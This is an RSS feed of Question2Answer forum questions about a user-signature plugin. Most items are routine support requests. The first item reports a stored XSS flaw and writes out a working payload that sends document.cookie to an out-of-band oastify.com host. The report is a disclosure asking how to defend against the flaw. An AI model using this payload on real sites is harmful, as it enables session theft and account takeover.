<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<title>Question2Answer Q&amp;A - Recent questions tagged signature</title>
<link>https://www.question2answer.org/qa/tag/signature</link>
<description>Powered by Question2Answer</description>
<item>
<title>Signature allow XSS</title>
<link>https://www.question2answer.org/qa/105012/signature-allow-xss</link>
<description>

&lt;p&gt;It's possible to inject JS into user's signature that leads to account takeover.&lt;/p&gt;

&lt;p&gt;Attackers change their signature to the following XSS payload and such JS will be executed is uses click such button.&lt;/p&gt;

&lt;blockquote&gt;

&lt;p&gt;Hi&amp;lt;button type=&quot;test&quot; formaction=&quot;javascript: alert('You have been hacked!'), fetch('&lt;a href=&quot;https://xxxxxxxxxxxxxxxxxxxx.oastify.com&quot; rel=&quot;nofollow&quot;&gt;https://xxxxxxxxxxxxxxxxxxxx.oastify.com&lt;/a&gt;?c=' +document.cookie)&quot;&amp;gt;CLICK HERE&amp;lt;/button&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;See example from our forum.&lt;/p&gt;

&lt;p&gt;&lt;img alt=&quot;&quot; src=&quot;https://www.question2answer.org/qa/?qa=blob&amp;amp;qa_blobid=9731905953567589198&quot; style=&quot;height:260px; width:600px&quot;&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Is there a solution to avoid this?&lt;/p&gt;

&lt;p&gt;We use following plugin for Signature:&amp;nbsp;&lt;a href=&quot;https://github.com/NoahY/q2a-signatures&quot; rel=&quot;nofollow&quot;&gt;https://github.com/NoahY/q2a-signatures&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thanks.&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/105012/signature-allow-xss</guid>
<pubDate>Tue, 29 Nov 2022 13:42:06 +0000</pubDate>
</item>
<item>
<title>Can't add a link in User Signature Plugin</title>
<link>https://www.question2answer.org/qa/63899/cant-add-a-link-in-user-signature-plugin</link>
<description>Hi everyone ;&lt;br /&gt;
&lt;br /&gt;
i want to make this option that every user in my q2a has a signature!&lt;br /&gt;
and you know that most of the time, signature has a LINK!&lt;br /&gt;
&lt;br /&gt;
but this plugin doesn's let you to do this! (add link or other HTML code)&lt;br /&gt;
&lt;br /&gt;
i change editor and every part of the setting that you think, but i can't reach that!&lt;br /&gt;
&lt;br /&gt;
pleaseee help meee!</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/63899/cant-add-a-link-in-user-signature-plugin</guid>
<pubDate>Thu, 10 May 2018 07:15:46 +0000</pubDate>
</item>
<item>
<title>Is there any good Signature plugins?</title>
<link>https://www.question2answer.org/qa/57429/is-there-any-good-signature-plugins</link>
<description>Is there any good signature plugins that will allow users to easily add HTML in their signature without having to know how to write html?</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/57429/is-there-any-good-signature-plugins</guid>
<pubDate>Tue, 25 Apr 2017 10:45:02 +0000</pubDate>
</item>
<item>
<title>How to add target=_blank in Signiture plugin</title>
<link>https://www.question2answer.org/qa/56135/how-to-add-target-_blank-in-signiture-plugin</link>
<description>How I can add href tag before or after with preg_replace in qa-sig-layer.php ?</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/56135/how-to-add-target-_blank-in-signiture-plugin</guid>
<pubDate>Mon, 06 Feb 2017 05:27:08 +0000</pubDate>
</item>
<item>
<title>Signature Plugin that can work with 1.7 version</title>
<link>https://www.question2answer.org/qa/43860/signature-plugin-that-can-work-with-1-7-version</link>
<description>Hello Folks,&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;Do you know of any Singature plugins that work with 1.7 version. &amp;nbsp;I tried looking and it seems like NoahY done it couple years ago and it is not working.&lt;br /&gt;
&lt;br /&gt;
I am happy to pay for the plugin, if somone creates it as premium plugin too. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
I would like to add a signature to each of my replies in the Q2A question saying a small disclaimer, any ideas or help is appreciated !</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/43860/signature-plugin-that-can-work-with-1-7-version</guid>
<pubDate>Thu, 19 Feb 2015 10:36:51 +0000</pubDate>
</item>
<item>
<title>Is anyone using q2a-signatures plugin in 1.6.2 ?</title>
<link>https://www.question2answer.org/qa/28968/is-anyone-using-q2a-signatures-plugin-in-1-6-2</link>
<description>

&lt;p&gt;
	I've found some issues, I think that the master-branch on github&lt;/p&gt;


&lt;p&gt;
	&lt;a href=&quot;https://github.com/NoahY/q2a-signatures&quot; rel=&quot;nofollow&quot;&gt;https://github.com/NoahY/q2a-signatures&lt;/a&gt;&lt;/p&gt;


&lt;p&gt;
	has not been tested on q2a 1.6.2.&lt;/p&gt;


&lt;p&gt;
	- the signature section doesn't display at all. In fact the options values in the admin page are not correct :&lt;/p&gt;


&lt;div&gt;
	PHP Notice: &amp;nbsp;Use of undefined constant QA_PERMIT_USER - assumed 'QA_PERMIT_USER' in /q2a/qa-plugin/q2a-signatures/qa-sig-admin.php on line 18&lt;/div&gt;


&lt;div&gt;
	PHP Notice: &amp;nbsp;Use of undefined constant QA_PERMIT_ADMIN - assumed 'QA_PERMIT_ADMIN' in /q2a/qa-plugin/q2a-signatures/qa-sig-admin.php on line 20&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;


&lt;div&gt;
	(I think they should be&amp;nbsp;QA_PERMIT_USERS and&amp;nbsp;QA_PERMIT_ADMINS, but I may be wrong)&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;


&lt;div&gt;
	- when I submit a new post (q,a,c), I see the new post and do not see the signature immediately. I have to refresh the page to see it.&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;


&lt;div&gt;
	- the characters counter does not decrease when I type&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;


&lt;div&gt;
	- if I enable the ckeditor4, I have 2 editors active (and not only one)&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;


&lt;div&gt;
	Finally, but I think that this behaviour is &quot;wanted&quot;, the signature section is displayed in the user profile page, which should be a read-only page, in my opinion. The widget should be in the account page.&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;


&lt;div&gt;
	&amp;nbsp;&lt;/div&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/28968/is-anyone-using-q2a-signatures-plugin-in-1-6-2</guid>
<pubDate>Sun, 10 Nov 2013 12:40:05 +0000</pubDate>
</item>
<item>
<title>Signature Plugin - Need To Modify</title>
<link>https://www.question2answer.org/qa/21098/signature-plugin-need-to-modify</link>
<description>

&lt;p&gt;
	&lt;span lang=&quot;EN&quot;&gt;This question is for NoahY mostly or for anyone else who would know and can help.&lt;/span&gt;&lt;/p&gt;


&lt;p&gt;
	&lt;span lang=&quot;EN-GB&quot;&gt;Little introduction here: I have been looking for ways to add PayPal donate button to user profile and under the each answer made by user. I have been trying to get a plugin developed but there seems to be no easy way to do this. &lt;/span&gt;&lt;/p&gt;


&lt;p&gt;
	&lt;span lang=&quot;EN&quot;&gt;So one day I thought, hey, signature plugin may work for this. So I installed the plugin, change some language from 'signature' to 'Donate to this member' and created a button code with PayPal and copy and pasted it to signature box, although I had HTML enabled the signature did not show as&amp;nbsp;the button but the whole code. So what I did was I uploaded the button image for the signature and went back to paypal and created a link for email and linked the button image to that and it works fine now.&lt;/span&gt;&lt;/p&gt;


&lt;p&gt;
	&lt;span lang=&quot;EN&quot;&gt;However, I would be more happy if I could somehow get it to work so that whe inserting the&amp;nbsp;button code to signature box then it would display the button.&lt;/span&gt;&lt;/p&gt;


&lt;p&gt;
	&lt;span lang=&quot;EN&quot;&gt;The other thing I want to know is, how can I modify the plugin so that only admin can set up and edit user signatures, so if the member wants to use a donate button then they will send me the code and I will set it up for them and they can not go and insert or add anything else in signature box, only me the Admin can.&lt;/span&gt;&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/21098/signature-plugin-need-to-modify</guid>
<pubDate>Sat, 02 Feb 2013 20:07:57 +0000</pubDate>
</item>
<item>
<title>Problem with Signature Plugin after update</title>
<link>https://www.question2answer.org/qa/13766/problem-with-signature-plugin-after-update</link>
<description>

&lt;p&gt;
	I install lastest version of &lt;a rel=&quot;nofollow&quot; href=&quot;https://github.com/NoahY/q2a-signatures&quot;&gt;Signature plugin&lt;/a&gt;&amp;nbsp;and here is my problem:&lt;/p&gt;


&lt;p&gt;
	&lt;img alt=&quot;&quot; src=&quot;http://www.question2answer.org/qa/?qa=blob&amp;amp;qa_blobid=7153262128695438460&quot; style=&quot;width: 283px; height: 359px;&quot;&gt;&lt;/p&gt;


&lt;p&gt;
	- Select &lt;strong&gt;Enable signatures&lt;/strong&gt; in both &lt;strong&gt;questions&lt;/strong&gt; and &lt;strong&gt;answers&lt;/strong&gt; ==&amp;gt; signature does show up&lt;/p&gt;


&lt;p&gt;
	- Select &lt;strong&gt;Enable signatures&lt;/strong&gt; in &lt;strong&gt;answers&lt;/strong&gt; only ==&amp;gt; signature does &lt;strong&gt;not&lt;/strong&gt; show up.&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/13766/problem-with-signature-plugin-after-update</guid>
<pubDate>Sun, 25 Mar 2012 09:20:24 +0000</pubDate>
</item>
<item>
<title>How to disable HTML in Signature ?</title>
<link>https://www.question2answer.org/qa/11790/how-to-disable-html-in-signature</link>
<description>&lt;a href=&quot;http://i.lulzimg.com/cb0c01e577.png&quot; rel=&quot;nofollow&quot;&gt;http://i.lulzimg.com/cb0c01e577.png&lt;/a&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/11790/how-to-disable-html-in-signature</guid>
<pubDate>Fri, 06 Jan 2012 09:57:21 +0000</pubDate>
</item>
<item>
<title>NoahY, Signature plugin doesn't work even after updating</title>
<link>https://www.question2answer.org/qa/10609/noahy-signature-plugin-doesnt-work-even-after-updating</link>
<description>I downloaded the latest version of this plugin yesterday using gitbash and after downloading all files, i copied all php and other files to the folder on this plugin in server but it doesn't show any signature for users. I also enabled signature in admin panel but it still doesn't work at all. Please help me. Please believe me that this plugin has problems and doesn't work.</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/10609/noahy-signature-plugin-doesnt-work-even-after-updating</guid>
<pubDate>Sun, 20 Nov 2011 15:30:31 +0000</pubDate>
</item>
<item>
<title>Signature Plugin - testing, anyone?</title>
<link>https://www.question2answer.org/qa/8298/signature-plugin-testing-anyone</link>
<description>

&lt;p&gt;
	It was mentioned that a lot of people were asking for this functionality, and it's kind of appealing so I made a plugin for signatures:
&lt;br&gt;
	
&lt;br&gt;
	&lt;a href=&quot;https://github.com/NoahY/q2a-signatures&quot; rel=&quot;nofollow&quot;&gt;https://github.com/NoahY/q2a-signatures&lt;/a&gt;
&lt;br&gt;
	
&lt;br&gt;
	Once you've got the admin box configured as you like it, go to your user profile, you'll see a new box to enter a signature. &amp;nbsp;Once you've saved that, go to a page with your post on it and you get a signature. &amp;nbsp;Pretty simple. &amp;nbsp;Fairly customizable...&lt;span style=&quot;text-decoration: line-through;&quot;&gt; only thing left is to enforce length limit&lt;/span&gt; done.&lt;/p&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/8298/signature-plugin-testing-anyone</guid>
<pubDate>Tue, 16 Aug 2011 08:52:21 +0000</pubDate>
</item>
<item>
<title>Is it possible that site members can add their signature to the question (as in forums)?</title>
<link>https://www.question2answer.org/qa/8284/possible-that-site-members-their-signature-question-forums</link>
<description>

&lt;p&gt;
	&lt;span id=&quot;result_box&quot; lang=&quot;en&quot;&gt;&lt;span class=&quot;hps&quot;&gt;Is it possible&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;that site members can&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;their&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;signature&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;to the question&lt;/span&gt; &lt;span class=&quot;hps atn&quot;&gt;(&lt;/span&gt;&lt;span&gt;as&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;forums)&lt;/span&gt;&lt;span&gt;?&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;It makes&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;visitors&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;want&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;to leave messages&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;because it's good&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;search engine optimization&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
<category>Q2A Core</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/8284/possible-that-site-members-their-signature-question-forums</guid>
<pubDate>Tue, 16 Aug 2011 03:25:52 +0000</pubDate>
</item>
<item>
<title>Is it possible to make a plugin that allows users to create signatures?</title>
<link>https://www.question2answer.org/qa/4776/is-possible-make-plugin-that-allows-users-create-signatures</link>
<description>

&lt;p&gt;
	Users could create the signature on their profile page, and every time they post, their signature would be added at the bottom. Is it possible to create a plugin that does this?&lt;/p&gt;


&lt;hr&gt;</description>
<category>Plugins</category>
<guid isPermaLink="true">https://www.question2answer.org/qa/4776/is-possible-make-plugin-that-allows-users-create-signatures</guid>
<pubDate>Sat, 19 Feb 2011 20:36:06 +0000</pubDate>
</item>
</channel>
</rss>